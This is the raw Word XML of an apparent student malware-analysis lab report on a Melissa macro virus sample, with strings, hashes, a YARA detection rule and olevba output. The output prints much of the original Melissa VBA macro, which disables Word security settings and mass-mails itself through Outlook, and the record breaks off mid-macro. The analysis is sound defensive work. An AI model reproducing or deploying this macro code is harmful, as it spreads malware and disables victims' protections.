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9428" w14:textId="1FDE8BC9" w:rsidR="004D4C7E" w:rsidRDefault="000E089B"/>
    <w:p w14:paraId="37A55CCF" w14:textId="5DE65347" w:rsidR="009816D8" w:rsidRDefault="009816D8"/>
    <w:p w14:paraId="6815C214" w14:textId="696C1FB8" w:rsidR="009816D8" w:rsidRDefault="009816D8" w:rsidP="009816D8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>It is a document file…. From Pestudio we get to know that it is</w:t>
      </w:r>
      <w:r w:rsidR="000B43A5">
        <w:t xml:space="preserve"> targeting</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> microsoft word document</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EAC451" w14:textId="734847C2" w:rsidR="009816D8" w:rsidRDefault="009816D8" w:rsidP="009816D8"/>
    <w:p w14:paraId="36F5DE6E" w14:textId="7E26155B" w:rsidR="009816D8" w:rsidRDefault="009816D8" w:rsidP="009816D8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="166BEC3A" wp14:editId="5D28B7F5">
            <wp:extent cx="5731510" cy="2516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16505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="160E3EB8" w14:textId="6A1F0D4B" w:rsidR="009816D8" w:rsidRDefault="009816D8" w:rsidP="009816D8"/>
    <w:p w14:paraId="444DDB53" w14:textId="27569243" w:rsidR="009816D8" w:rsidRDefault="000B43A5" w:rsidP="009816D8">
      <w:r>
        <w:t xml:space="preserve">Also it is targeting the microsoft outlook probably trying to </w:t>
      </w:r>
      <w:r w:rsidR="0033355C">
        <w:t>access email.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353937BF" w14:textId="1379092B" w:rsidR="009816D8" w:rsidRDefault="00B35474" w:rsidP="009816D8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Static analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25615F75" w14:textId="7B3355D4" w:rsidR="00B35474" w:rsidRDefault="00B35474" w:rsidP="00B35474">
      <w:r>
        <w:t>Initially we receive the below strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C01744" w14:textId="2D49E93E" w:rsidR="00B35474" w:rsidRDefault="00B35474" w:rsidP="00B35474">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0785C1CC" wp14:editId="0D3D265C">
            <wp:extent cx="5731510" cy="19672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67230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1444D68A" w14:textId="6A99AFF6" w:rsidR="00B35474" w:rsidRDefault="00B35474" w:rsidP="00B35474">
      <w:r>
        <w:t>From the above strings it is clear that. It is going to execute a code after opening the document so it’s a macro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD15F8F" w14:textId="77777777" w:rsidR="00B35474" w:rsidRDefault="00B35474" w:rsidP="00B35474"/>
    <w:p w14:paraId="339AE8BA" w14:textId="33EFFC1E" w:rsidR="00B35474" w:rsidRDefault="00B35474" w:rsidP="00B35474">
      <w:r>
        <w:t>We have some more strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353C120E" w14:textId="626DD9C4" w:rsidR="00B35474" w:rsidRDefault="00B35474" w:rsidP="00B35474">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B480D38" wp14:editId="79C4F1B1">
            <wp:extent cx="5731510" cy="3162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62935"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="631E99A1" w14:textId="6F074E29" w:rsidR="00B35474" w:rsidRDefault="00B35474" w:rsidP="00B35474">
      <w:r>
        <w:t>So we can guess that it is a macro virus and the name of the malware may be malissa</w:t>
      </w:r>
      <w:r w:rsidR="001D1FD6">
        <w:t xml:space="preserve"> and it infects computers via emails </w:t>
      </w:r>
      <w:r w:rsidR="00775ABA">
        <w:t xml:space="preserve">by getting outlook profile password (from the strings outlook,profile,password) </w:t>
      </w:r>
      <w:r w:rsidR="001D1FD6">
        <w:t xml:space="preserve">and we can see some contect of the emails in the strings like “important message from”, “here is that document u asked for … don’t show anyone else” </w:t>
      </w:r>
      <w:r w:rsidR="00A03F9E">
        <w:t xml:space="preserve"> etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0987AE30" w14:textId="35320BC7" w:rsidR="00B35474" w:rsidRDefault="00B35474" w:rsidP="00B35474"/>
    <w:p w14:paraId="5BFAAECD" w14:textId="03793CEB" w:rsidR="00B35474" w:rsidRPr="001D1FD6" w:rsidRDefault="00B35474" w:rsidP="00B35474">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D1FD6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Here what we got from web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D22C468" w14:textId="68B18050" w:rsidR="00B35474" w:rsidRDefault="00B35474" w:rsidP="00B35474">
      <w:r w:rsidRPr="00B35474">
        <w:t>The Melissa virus was a mass-mailing macro virus released on or around March 26, 1999. As it was not a standalone program, it was not classified as a worm. It targeted Microsoft Word and Outlook-based systems and created considerable network traffic. The virus would infect computers via Email, the email being titled "Important Message From", followed by the current username. Upon clicking the message, the body would read: "Here's that document you asked for. Don't show anyone else ;)." Attached was a Word document titled list.doc containing a list of pornographic sites and accompanying logins for each. It would then mass mail itself to the first fifty people in the user's contact list and then disable multiple safeguard features on Microsoft Word and Microsoft Outlook.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9478EA" w14:textId="66EFB2E0" w:rsidR="00A03F9E" w:rsidRDefault="00A03F9E" w:rsidP="00B35474"/>
    <w:p w14:paraId="6F26A32F" w14:textId="7202B89F" w:rsidR="00AD4DA8" w:rsidRDefault="00AD4DA8" w:rsidP="00B35474">
      <w:r>
        <w:t>Similar types of file from the wild</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8C9F22" w14:textId="77777777" w:rsidR="00AD4DA8" w:rsidRDefault="00AD4DA8" w:rsidP="00B35474"/>
    <w:p w14:paraId="00991E44" w14:textId="7E35DE5C" w:rsidR="00AD4DA8" w:rsidRDefault="00B31825" w:rsidP="00B35474">
      <w:r w:rsidRPr="00B31825">
        <w:t>0a56baab11a888b2741bffc5fe7a52596b58f1d8e842770b21de82bd12a20484</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A05E76" w14:textId="1165A309" w:rsidR="00B31825" w:rsidRDefault="00B31825" w:rsidP="00B35474">
      <w:r w:rsidRPr="00B31825">
        <w:t>ff05182a14ea139b331217159f327a24cf826ef1173262ae47823df7cbfa747c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549E585A" w14:textId="0CD33A1D" w:rsidR="00B31825" w:rsidRDefault="000E089B" w:rsidP="00B35474">
      <w:r>
        <w:t>and the yara rule worked for those files as well…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E37331E" w14:textId="080B1A44" w:rsidR="00B31825" w:rsidRDefault="00B31825" w:rsidP="00B35474">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CFB68D6" wp14:editId="1863A723">
            <wp:extent cx="5731510" cy="16808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0845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4B1E89" w14:textId="3B7D619E" w:rsidR="00AD4DA8" w:rsidRDefault="000E089B" w:rsidP="00B35474">
      <w:r>
        <w:t>Yara output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AE1D9C" w14:textId="0D2AB414" w:rsidR="00A03F9E" w:rsidRDefault="00A03F9E" w:rsidP="00B35474">
      <w:r>
        <w:t>Yara rule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBC5B4D" w14:textId="5B07817F" w:rsidR="00A03F9E" w:rsidRDefault="00A03F9E" w:rsidP="00B35474"/>
    <w:p w14:paraId="1DEFF771" w14:textId="5A539131" w:rsidR="00A03F9E" w:rsidRDefault="00A03F9E" w:rsidP="00A03F9E">
      <w:r>
        <w:t xml:space="preserve">rule </w:t>
      </w:r>
      <w:r>
        <w:t>Mellissa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F4603A" w14:textId="77777777" w:rsidR="00A03F9E" w:rsidRDefault="00A03F9E" w:rsidP="00A03F9E">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1C510F" w14:textId="77777777" w:rsidR="00A03F9E" w:rsidRDefault="00A03F9E" w:rsidP="00A03F9E">
      <w:r>
        <w:t xml:space="preserve">    strings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5E8AF0" w14:textId="127711FC" w:rsidR="00A03F9E" w:rsidRDefault="00A03F9E" w:rsidP="00A03F9E">
      <w:r>
        <w:t xml:space="preserve">        $a= "</w:t>
      </w:r>
      <w:r w:rsidRPr="00A03F9E">
        <w:t>Microsoft Office Word</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2204CE8A" w14:textId="2CCDD4BC" w:rsidR="00A03F9E" w:rsidRDefault="00A03F9E" w:rsidP="00A03F9E">
      <w:r>
        <w:t xml:space="preserve">        $b= "</w:t>
      </w:r>
      <w:r w:rsidRPr="00A03F9E">
        <w:t>Document_Open</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D744433" w14:textId="61501595" w:rsidR="00A03F9E" w:rsidRDefault="00A03F9E" w:rsidP="00A03F9E">
      <w:r>
        <w:t xml:space="preserve">        $c= "</w:t>
      </w:r>
      <w:r w:rsidRPr="00A03F9E">
        <w:t>Root Entry</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6069179E" w14:textId="6C5BC722" w:rsidR="00A03F9E" w:rsidRDefault="00A03F9E" w:rsidP="00A03F9E">
      <w:r>
        <w:t xml:space="preserve">        $d= "</w:t>
      </w:r>
      <w:r w:rsidR="000B43A5" w:rsidRPr="000B43A5">
        <w:t>Macros</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABBDFFE" w14:textId="2E7B80ED" w:rsidR="00A03F9E" w:rsidRDefault="00A03F9E" w:rsidP="00A03F9E">
      <w:r>
        <w:t xml:space="preserve">        $e= "</w:t>
      </w:r>
      <w:r w:rsidR="000B43A5" w:rsidRPr="000B43A5">
        <w:t>Outlook.Application</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548CD3B6" w14:textId="28D6F048" w:rsidR="00A03F9E" w:rsidRDefault="00A03F9E" w:rsidP="00A03F9E">
      <w:r>
        <w:t xml:space="preserve">        $f= "</w:t>
      </w:r>
      <w:r w:rsidR="000B43A5" w:rsidRPr="000B43A5">
        <w:t>Melissa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">"  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A2CF0D" w14:textId="4473E907" w:rsidR="00A03F9E" w:rsidRDefault="00A03F9E" w:rsidP="00A03F9E">
      <w:r>
        <w:t xml:space="preserve">        $g=  "</w:t>
      </w:r>
      <w:r w:rsidR="000B43A5" w:rsidRPr="000B43A5">
        <w:t>Here is that document you asked for ... don't show anyone else ;-)</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EDE8B6" w14:textId="56746CF9" w:rsidR="00A03F9E" w:rsidRDefault="00A03F9E" w:rsidP="00A03F9E">
      <w:r>
        <w:t xml:space="preserve">        $h=  "</w:t>
      </w:r>
      <w:r w:rsidR="000B43A5" w:rsidRPr="000B43A5">
        <w:t>... by Kwyjibo</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0305506F" w14:textId="6CB92270" w:rsidR="00A03F9E" w:rsidRDefault="00A03F9E" w:rsidP="00A03F9E">
      <w:r>
        <w:t xml:space="preserve">        $i=  "</w:t>
      </w:r>
      <w:r w:rsidR="000B43A5" w:rsidRPr="000B43A5">
        <w:t>Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEB5C48" w14:textId="142A6DA7" w:rsidR="00A03F9E" w:rsidRDefault="00A03F9E" w:rsidP="00A03F9E">
      <w:r>
        <w:t xml:space="preserve">        $j=  "</w:t>
      </w:r>
      <w:r w:rsidR="000B43A5" w:rsidRPr="000B43A5">
        <w:t xml:space="preserve">Word -&gt; Email | Word 97 &lt;--&gt; Word 2000 ... it's a new age! </w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49402B92" w14:textId="6B1577F2" w:rsidR="00A03F9E" w:rsidRDefault="00A03F9E" w:rsidP="00A03F9E">
      <w:r>
        <w:t xml:space="preserve">        $k=  "</w:t>
      </w:r>
      <w:r w:rsidR="000B43A5" w:rsidRPr="000B43A5">
        <w:t xml:space="preserve"> Twenty-two points, plus triple-word-score, plus fifty points for using all my letters.  Game's over.  I'm outta here. </w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD462B8" w14:textId="025C39D4" w:rsidR="00A03F9E" w:rsidRDefault="00A03F9E" w:rsidP="00A03F9E">
      <w:r>
        <w:t xml:space="preserve">        $l=  "</w:t>
      </w:r>
      <w:r w:rsidR="000B43A5" w:rsidRPr="000B43A5">
        <w:t>WORD/Melissa written by Kwyjibo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6A5133" w14:textId="0D832CB3" w:rsidR="00A03F9E" w:rsidRDefault="00A03F9E" w:rsidP="000B43A5">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidR="00F0055A">
        <w:t xml:space="preserve">$m= </w:t>
      </w:r>
      <w:r w:rsidR="008F4250">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00F0055A">
        <w:t>outlook</w:t>
      </w:r>
      <w:r w:rsidR="008F4250">
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACBDEDB" w14:textId="5D037E50" w:rsidR="00F0055A" w:rsidRDefault="00F0055A" w:rsidP="000B43A5">
      <w:r>
        <w:t xml:space="preserve">        $n = </w:t>
      </w:r>
      <w:r w:rsidR="008F4250">
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>profile</w:t>
      </w:r>
      <w:r w:rsidR="008F4250">
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F81577" w14:textId="45CF8567" w:rsidR="00F0055A" w:rsidRDefault="00F0055A" w:rsidP="000B43A5">
      <w:r>
        <w:t xml:space="preserve">        $o= </w:t>
      </w:r>
      <w:r w:rsidR="008F4250">
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidR="008F4250">
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B9BDCF" w14:textId="77777777" w:rsidR="00A03F9E" w:rsidRDefault="00A03F9E" w:rsidP="00A03F9E">
      <w:r>
        <w:t xml:space="preserve">    condition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB39573" w14:textId="6BA04AE5" w:rsidR="00A03F9E" w:rsidRDefault="00A03F9E" w:rsidP="00A03F9E">
      <w:r>
        <w:t xml:space="preserve">        ($a and $b and $c and $d  </w:t>
      </w:r>
      <w:r w:rsidR="00F0055A">
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> $e</w:t>
      </w:r>
      <w:r w:rsidR="00F0055A">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or $f or $g </w:t>
      </w:r>
      <w:r w:rsidR="00F0055A">
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> $h </w:t>
      </w:r>
      <w:r w:rsidR="00F0055A">
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> $i </w:t>
      </w:r>
      <w:r w:rsidR="00F0055A">
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> $j </w:t>
      </w:r>
      <w:r w:rsidR="00F0055A">
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> $k </w:t>
      </w:r>
      <w:r w:rsidR="00F0055A">
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> $l or </w:t>
      </w:r>
      <w:r w:rsidR="00F0055A">
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">$m </w:t>
      </w:r>
      <w:r w:rsidR="00F0055A">
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> $n </w:t>
      </w:r>
      <w:r w:rsidR="00F0055A">
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> $o</w:t>
      </w:r>
      <w:r w:rsidR="00F0055A">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FFCDE3" w14:textId="1B36C53C" w:rsidR="00A03F9E" w:rsidRDefault="00A03F9E" w:rsidP="00A03F9E">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F39615F" w14:textId="7759336E" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00A03F9E"/>
    <w:p w14:paraId="3416EC76" w14:textId="6E7A3B1D" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00A03F9E"/>
    <w:p w14:paraId="623AB5FA" w14:textId="01642E23" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00A03F9E"/>
    <w:p w14:paraId="7B4AA0EB" w14:textId="0E588515" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00A03F9E">
      <w:r>
        <w:t>Olevba output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F61C8A" w14:textId="20B1D6E4" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00A03F9E"/>
    <w:p w14:paraId="26616FFA" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>olevba 0.60 on Python 3.7.9 - http://decalage.info/python/oletools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0311A17E" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>===============================================================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566CFFD1" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>FILE: sample_lab6_18_sep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9ED2BD" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>Type: OLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E077707" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>-------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6DFD45" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">VBA MACRO Melissa.cls </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5999FC9B" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>in file: sample_lab6_18_sep - OLE stream: 'Macros/VBA/Melissa'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037CBD86" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637F70C7" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>Private Sub Document_Open()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B167DDA" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>On Error Resume Next</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E6DBD4" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") &lt;&gt; "" Then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8C205D" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>CommandBars("Macro").Controls("Security...").Enabled = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C29382" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A1C8A8" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>Else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319B9432" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>CommandBars("Tools").Controls("Macro").Enabled = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389120B9" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A13BE4" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>End If</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8355C5" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7E4C65" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>Set UngaDasOutlook = CreateObject("Outlook.Application")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4592D5" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671EF4E8" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") &lt;&gt; "... by Kwyjibo" Then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A6481E" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>If UngaDasOutlook = "Outlook" Then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B296696" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t>DasMapiName.Logon "profile", "password"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E517178" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    For y = 1 To DasMapiName.AddressLists.Count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057ACE81" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">        Set AddyBook = DasMapiName.AddressLists(y)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5350F065" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">        x = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6323421C" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">        Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAC09D5" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">        For oo = 1 To AddyBook.AddressEntries.Count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15020C2B" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">            Peep = AddyBook.AddressEntries(x)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9994A8" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">            BreakUmOffASlice.Recipients.Add Peep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E8AC00" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">            x = x + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391B53F7" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">            If x &gt; 50 Then oo = AddyBook.AddressEntries.Count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68710E02" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">         Next oo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5433566A" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">         BreakUmOffASlice.Subject = "Important Message From " &amp; Application.UserName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50870BBB" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">         BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D9DC00" w14:textId="77777777" w:rsidR="00CA1B47" w:rsidRDefault="00CA1B47" w:rsidP="00CA1B47">
      <w:r>
        <w:t xml:space="preserve">         BreakUmOffASlice.Attachments.Add ActiveDocument.FullName</w:t>
      </w:r>
